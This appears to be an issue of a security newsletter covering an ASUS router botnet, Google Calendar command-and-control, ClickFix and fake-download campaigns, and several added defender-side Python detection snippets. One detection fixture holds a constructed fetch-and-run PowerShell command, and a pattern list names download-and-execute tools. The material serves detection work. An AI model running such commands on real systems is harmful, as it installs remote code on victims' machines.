🎓️ Vulnerable U | #118
ASUS botnet, Everything is a C2 (even your calendar), Bitcoin-related kidnappings and violence continue, Fake AI Video Generators are delivering malware, and much more!
Read Time: 8 minutes

Today’s sponsor ….me!:
I randomly found myself in Bastrop, TX this weekend and found myself in Ryan Holiday’s bookstore. I’ve wanted to check it out for a bit as I’ve read a number of his books and am generally a fan of his work. It was worth the drop in and I bought some books to support a local shop, including “Everything is Tuberculosis” by John Green, which I’m excited to read.
ICYMI
🖊️ Something I wrote: Tim Cook personally called TX Gov Abbott urging changes/veto to new online child safety bill. Bill would require Apple to implement age verification for all device owners.
🎧️ Something I heard: Blake Scholl interviewed about how he went from high school dropout to Groupon to the founder of a supersonic jet startup. - I used to live in the flight path of the old Concorde jets landing and always loved seeing them. Was fun to listen to the story of how he’s trying to bring them back.
🎤 Something I said: Did ChatGPT just find its first zero day???
🔖 Something I read: Claude 4 Opus vs. Gemini 2.5 pro vs. OpenAI o3: Coding comparison
Vulnerable News
GreyNoise caught a pretty slick ASUS router botnet using their AI traffic analysis tool called SIFT. The attackers are chaining together brute force attacks, auth bypass tricks, and command injection to plant SSH backdoors on thousands of routers. They're using ASUS's own official SSH settings to install their public key, which means the backdoor survives firmware updates even after the original vulns get patched.
The attack flow exploits CVE-2023-39780 to create a file that enables TrendMicro's bandwidth logging feature, then leverages that for more command injection opportunities. The count of compromised hosts keeps climbing: GreyNoise’s sensor grid and a Censys census put the tally at ~9,000 backdoored routers (up from ~4,800 in March), all with SSH listening on port 53282 and the same attacker-controlled key installed.
ASUS did try to patch the OAuth vulnerability, but the researchers found the fix might not be complete. If you've got an ASUS router exposed to the internet, might be time to check if you've got an unexpected SSH service running. (read more)
You might’ve missed this, but I’ve been building an agency behind the scenes at Vulnerable U. We’ve been helping dozens of security companies connect with the security community in a meaningful way.
Technically credible content is our bread and butter at Vulnerable Media, a crew of hackers, practitioners, marketing experts, and storytellers. We turn deep technical features into messages that buyers understand and want to connect with. We understand your customer, because we’ve been your customer. Imagine having a CISO in the room with you as you craft your GTM strategy.
Need launch buzz, ongoing thought-leadership, or a full content engine? We plug in fast, write in your voice, and keep the cringe on mute. See what effective, practitioner driven, security marketing feels like. You won’t need to teach us how to spell Kubernetes.
Another crypto crime story, this time it’s absolutely bananas. A third suspect just surrendered in that wild Bitcoin kidnapping case out of Manhattan. William Duplessie, 33, turned himself in Tuesday after days of negotiations with NYPD, joining John Woeltz who was nabbed Friday. They're accused of holding a man captive for nearly three weeks(?!) in a $75k/month NoLIta townhouse, subjecting him to some horrific torture to get his Bitcoin wallet password.
The victim, Michael Carturan, who appears to have been a security auditor in crypto, finally escaped on Friday and flagged down a traffic agent. According to police, these guys went medieval. Using electrical shocks, whipping with guns, forced crack smoking, and even dangling him from the fifth floor. Investigators found photos of the torture plus weapons when they searched the place. (read more)
Here's a clever one - Vietnamese cybercriminals, UNC6032, have been flooding Facebook and LinkedIn with fake AI video generator ads for the past year. They're copying popular tools like Luma AI and Kling AI, setting up convincing landing pages that look legit, then serving up malware-stuffed ZIP files to anyone curious enough to "try the demo." No exploits needed when you've got AI hype doing the heavy lifting. Google counted 30+ domains and over 2.3 million ad views in the EU alone.

Funny trick they use in the file name: `.mp4`, then a couple dozen spaces, then `.exe`, so the real extension is pushed out of view in a file listing.
The infection chain is pretty gnarly. A Rust-based dropper called STARKVEIL, followed by Python loaders and three different payloads (GRIMPULL, XWORM, FROSTRIFT) that steal everything from browser cookies to crypto wallet extensions. They're targeting marketing agencies, media outlets, and small businesses, where someone is inevitably going to click "generate video." They're even using the stolen credentials to buy more malicious ads, creating a self-funding cycle. (read more)
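A defender-side check for the padded-extension trick above, as an added example that is not part of the original post or Google's report: it collapses every whitespace run (plain spaces and non-breaking spaces alike, a small generalisation of the campaign's spaces-only padding) and flags a decoy extension sitting in front of an executable one. The extension lists and the sample file names are constructed assumptions.

```python
import re
import unicodedata

# Constructed sample names (not from the campaign): True means "should be flagged".
SAMPLES = {
    "demo_video.mp4                              .exe": True,
    "demo_video.mp4": False,
    "report.pdf.exe": True,
    "holiday.mov\u00a0\u00a0\u00a0\u00a0.scr": True,   # non-breaking spaces as padding
    "notes.txt": False,
}

# Assumed, representative subsets: extensions Windows runs on double-click, and
# extensions a lure wants the victim to believe they are opening.
EXECUTABLE_EXTS = {"exe", "scr", "bat", "cmd", "com", "pif", "js", "vbs", "hta", "msi"}
DECOY_EXTS = {"mp4", "mov", "avi", "pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}


def normalize_name(name: str) -> str:
    """Collapse every Unicode whitespace run so padding cannot hide the last extension."""
    return re.sub(r"\s+", "", unicodedata.normalize("NFKC", name))


def is_disguised_executable(name: str) -> bool:
    """True when the visible 'extension' is a decoy and the real one executes."""
    parts = normalize_name(name).lower().split(".")
    if len(parts) < 3:  # need at least name.decoy.real
        return False
    decoy, real = parts[-2], parts[-1]
    return decoy in DECOY_EXTS and real in EXECUTABLE_EXTS


def scan(names):
    """Return the names from an iterable that match the lure pattern."""
    return [n for n in names if is_disguised_executable(n)]
```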
ConnectWise just got popped by what they're calling a "sophisticated nation state actor" in their ScreenConnect cloud environment. They brought in Mandiant, notified the handful of affected customers, and are claiming it was a tight, limited breach with no ongoing activity. The usual playbook stuff - enhanced monitoring, MFA requirements, and pushing everyone to upgrade to version 25.2.4.
Here's the problem though: ConnectWise is being frustratingly vague about the actual details. No IOCs shared, no specifics about what was actually vulnerable, and a "trust us, we fixed it" approach. For MSPs who rely on ScreenConnect to manage thousands of endpoints, this lack of transparency is a real issue. You can't hunt for threats when you don't know what to look for. (read more)
Everything is a Command & Control server if you try hard enough!

The Chinese state-sponsored group, APT41, got creative this time, using Google Calendar as their command and control infrastructure for a malware called "TOUGHPROGRESS." They compromised a government website to host their payload, then sent spear phishing emails with fake customs declaration PDFs. The malware itself has a three-stage deployment with process hollowing, encryption, and some clever obfuscation techniques that overflow 64-bit registers to hide function calls.
They're abusing legitimate cloud services to blend in with normal traffic. The malware creates calendar events with encrypted commands and results hidden in the descriptions, using hardcoded dates to communicate.
Google wasn't having it and developed custom fingerprints to identify and nuke the attacker-controlled calendars, terminated the Workspace projects, and updated Safe Browsing to block the malicious domains. It's part of a broader pattern where APT41 keeps trying to abuse Google services like Sheets and Drive for C2, only to get shut down each time. (read more)
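A defender-side triage of calendar events for the pattern described above (encrypted blobs in event descriptions, pinned to fixed dates), written as an added example and not taken from Google's write-up. The event records are constructed in the shape of Calendar API list items, the base64/entropy thresholds are assumptions, and the same logic applies to any cloud service whose free-text fields can carry a C2 channel.

```python
import base64
import math
import random
import re
from collections import Counter, defaultdict

# Constructed sample events (not real TOUGHPROGRESS traffic); two carry
# high-entropy base64 blobs pinned to the same all-day date.
_rng = random.Random(1)
_blob = lambda n: base64.b64encode(bytes(_rng.getrandbits(8) for _ in range(n))).decode()
EVENTS = [
    {"id": "e1", "summary": "Team sync", "start": {"date": "2025-06-02"},
     "description": "Discuss the Q3 roadmap and hiring plan."},
    {"id": "e2", "summary": "", "start": {"date": "2023-05-30"}, "description": _blob(192)},
    {"id": "e3", "summary": "", "start": {"date": "2023-05-30"}, "description": _blob(240)},
    {"id": "e4", "summary": "Dentist", "start": {"dateTime": "2025-06-05T09:00:00Z"},
     "description": ""},
]

B64_RE = re.compile(r"^[A-Za-z0-9+/=]+$")


def shannon_entropy(s: str) -> float:
    """Bits per character: prose sits around 4, encoded ciphertext near 6."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_payload(desc: str, min_len: int = 64, min_entropy: float = 5.0) -> bool:
    """A long, all-base64, high-entropy description is a blob, not a meeting note."""
    compact = re.sub(r"\s+", "", desc)
    return (len(compact) >= min_len and bool(B64_RE.match(compact))
            and shannon_entropy(compact) >= min_entropy)


def find_suspicious_events(events):
    """Flag payload-like descriptions, then group them by start date: several
    blobs pinned to one date is the hardcoded-date rendezvous pattern."""
    flagged = [e for e in events if looks_like_payload(e.get("description", ""))]
    by_date = defaultdict(list)
    for e in flagged:
        day = e["start"].get("date") or e["start"].get("dateTime", "")[:10]
        by_date[day].append(e["id"])
    return flagged, dict(by_date)
```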
LexisNexis Risk Solutions just disclosed a breach affecting over 364,000 customers, but it’s a breach with a twist! Their own systems weren't touched. Instead, an unauthorized party grabbed customer data from a third-party platform that turned out to be GitHub. The breach happened back on Christmas Day, but they didn't find out until April 1st, which is quite the discovery delay.
The compromised data includes the usual suspects: names, addresses, SSNs, driver's license numbers, and dates of birth. LexisNexis is being somewhat coy about GitHub in their official breach notices, just calling it a "third-party platform used for software development." No threat group has claimed responsibility yet, and there's no evidence the data's been misused. They're offering the standard two years of credit monitoring. (read more)
Phishers found a new trick - they're abusing Google Apps Script to host their fake login pages. Since these pages live on script.google.com, they look totally legit and sail right past most security filters that whitelist Google domains. Cofense spotted this trend where attackers send invoice or tax-themed phishing emails that link to these Google-hosted credential thieves.

The beauty of this approach (from the attacker's perspective) is that anyone can publish a script as a public web app and get a Google domain for free. After victims enter their creds, they get redirected to the real service to keep suspicions low. Your best defense here is probably configuring email security to be more suspicious of cloud service links, or just blocking Google Apps Script URLs entirely if you can swing it. (read more)
I’ve been talking about ClickFix a TON lately. (Just check my YouTube out)
This one starts with a fake email thread about apartment rentals through Booking.com. The attacker poses as someone whose colleague got sick and handed off the rental booking task, asking the target to verify some accommodation surcharge info through a malicious link. Pretty believable social engineering, honestly.


The fun part is the execution method. After a real Cloudflare CAPTCHA, victims hit a fake one that automatically copies a PowerShell script to their clipboard when they click it. Then it literally gives them step-by-step instructions: press Windows+R, paste with Ctrl+V, and hit Enter. If they follow through, boom - they've just downloaded and executed DCRat malware. The write-up shows how to catch this attack with Sublime's AI detection, which flags several red flags at once: the newly registered domain, brand impersonation, and the fake email thread. (read more)
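One host-side artifact of the Win+R flow above is the Run dialog's history, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (one value per slot, each ending in "\1", with MRUList ordering the slots newest-first). The triage below is an added example, not Sublime's detection or anything from the original post; the exported values are constructed, and the keyword patterns and the two-hit threshold are assumptions.

```python
import re

# Constructed RunMRU export (made-up commands; the live key is read from the registry).
RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "powershell -w hidden -c \"iwr http://example.invalid/v.txt | iex\"\\1",
}

# Traits of a pasted one-liner rather than a program name a user typed.
SUSPICIOUS = [
    re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|bitsadmin|certutil)\b", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|iex|invoke-expression|downloadstring)\b", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden|-(e|enc|encodedcommand)\b", re.I),
    re.compile(r"https?://", re.I),
]


def runmru_entries(export):
    """Yield (slot, command) newest-first, stripping the trailing '\\1' marker."""
    for slot in export.get("MRUList", ""):
        raw = export.get(slot, "")
        yield slot, raw[:-2] if raw.endswith("\\1") else raw


def score(command: str) -> int:
    """Number of suspicious traits present in one Run-dialog command."""
    return sum(1 for p in SUSPICIOUS if p.search(command))


def find_clickfix_runs(export, min_hits: int = 2):
    """Return [(slot, command, hits)] for history entries that look like a pasted loader."""
    return [(s, c, score(c)) for s, c in runmru_entries(export) if score(c) >= min_hits]
```

On a real host, feed this the values exported from the user's RunMRU key and correlate any hit with a PowerShell process start in the same minute.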
The UK just dropped the diplomatic niceties around cyberwarfare. Defense Secretary John Healey straight-up admitted (announced?) they're ramping up offensive cyberattacks against Russia and China, saying "the keyboard is now a weapon of war." This is pretty unprecedented - ministers have never been this explicit about launching cyberattacks against state actors before. They're standing up a new cyber command under General Sir James Hockenhull to coordinate these digital offensive capabilities, and throwing over £1 billion at a "digital targeting web" system.
The numbers behind this are telling. The MoD has faced 90,000 cyberattacks from state-linked sources in the past two years, which is double what they saw in the previous period. These numbers are always hard to take seriously. What do they deem an “attack?” A port scan? Who knows.
Healey's basically saying the gloves are off and they're moving from defense to offense. The Strategic Defense Review drops on Monday, and it appears that cyber and autonomous systems will be at the forefront. Makes sense given how much Ukraine has shown that future conflicts will be won by whoever can connect their forces better and strike faster. (read more)
A new Windows RAT managed to fly under the radar for weeks by corrupting its DOS and PE headers - basically making itself look like garbage data while still being executable. Fortinet's IR team found it running in dllhost.exe after piecing together memory dumps from an infected machine. The RAT talks to its C2 over TLS (using "rushpapers[.]com") and can do the usual stuff - screenshots, service manipulation, plus it can accept inbound connections to turn the victim into a pivot point. They haven't figured out how it's spreading yet, but the multi-threaded design suggests the attackers want to use compromised systems as platforms for further attacks.
By mangling the headers that Windows uses to validate executables, the malware makes itself really hard to analyze while still maintaining functionality. (read more)
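A defender-side check for the header mangling described above, as an added example (not Fortinet's tooling or anything from the original write-up): it walks the DOS header, e_lfanew and PE signature of an in-memory region and reports what is broken. The regions are constructed headers, not real dumps, and the Machine/section-count plausibility bounds are assumptions.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D      # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550   # "PE\0\0"
KNOWN_MACHINES = {0x14C, 0x8664, 0xAA64}   # i386, AMD64, ARM64


def check_pe_headers(buf: bytes):
    """Return a list of header problems for an in-memory image; empty means the
    DOS header, e_lfanew and NT signature are intact."""
    problems = []
    if len(buf) < 64:
        return ["buffer shorter than IMAGE_DOS_HEADER"]
    e_magic, = struct.unpack_from("<H", buf, 0)
    if e_magic != IMAGE_DOS_SIGNATURE:
        problems.append(f"e_magic is {e_magic:#06x}, expected 'MZ'")
    e_lfanew, = struct.unpack_from("<I", buf, 0x3C)
    if not 0x40 <= e_lfanew <= len(buf) - 24:   # signature + IMAGE_FILE_HEADER must fit
        problems.append(f"e_lfanew {e_lfanew:#x} does not point inside the buffer")
        return problems
    sig, = struct.unpack_from("<I", buf, e_lfanew)
    if sig != IMAGE_NT_SIGNATURE:
        problems.append(f"NT signature at {e_lfanew:#x} is {sig:#010x}, expected 'PE\\0\\0'")
    machine, nsections = struct.unpack_from("<HH", buf, e_lfanew + 4)
    if machine not in KNOWN_MACHINES:
        problems.append(f"unknown Machine {machine:#x}")
    if not 1 <= nsections <= 96:
        problems.append(f"implausible NumberOfSections {nsections}")
    return problems


def build_image(dos_magic=b"MZ", pe_sig=b"PE\0\0", machine=0x8664, nsections=3):
    """Construct a minimal header layout for testing (not a real binary)."""
    dos = bytearray(0x80)
    dos[:2] = dos_magic
    struct.pack_into("<I", dos, 0x3C, 0x80)   # e_lfanew -> right after the DOS stub
    nt = pe_sig + struct.pack("<HH", machine, nsections) + bytes(16)
    return bytes(dos) + nt + bytes(256)


def find_corrupted_images(regions):
    """Given {name: bytes} executable regions, map each broken one to its problems."""
    out = {}
    for name, region in regions.items():
        problems = check_pe_headers(region)
        if problems:
            out[name] = problems
    return out
```

A mangled header is also what many packers and reflective loaders leave behind, so treat a hit as a triage lead to pair with the process context (here, code living in dllhost.exe), not as a verdict on its own.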
A fake Bitdefender download page is pushing a ton of malware including VenomRAT, StormKitty, and SilentTrinity. DomainTools caught the operation which uses a convincing clone of Bitdefender's Windows download page to deliver the payload. It's a smart combo - StormKitty hunts for financial credentials and crypto wallets, while SilentTrinity maintains persistent backdoor access.
Bitdefender spotted this back in May and is working with Cloudflare to nuke the site, though attribution is tricky since VenomRAT is widely available as malware-as-a-service. The same threat actor is likely running similar campaigns impersonating banks and IT providers. (read more)
Miscellaneous mattjay
There was a Peak.
— SwiftOnSecurity (@SwiftOnSecurity)
1:25 AM • May 30, 2025


How'd I do this edition? It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.
Parting Thoughts:
Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.
Stay safe, Matt Johansen
@mattjay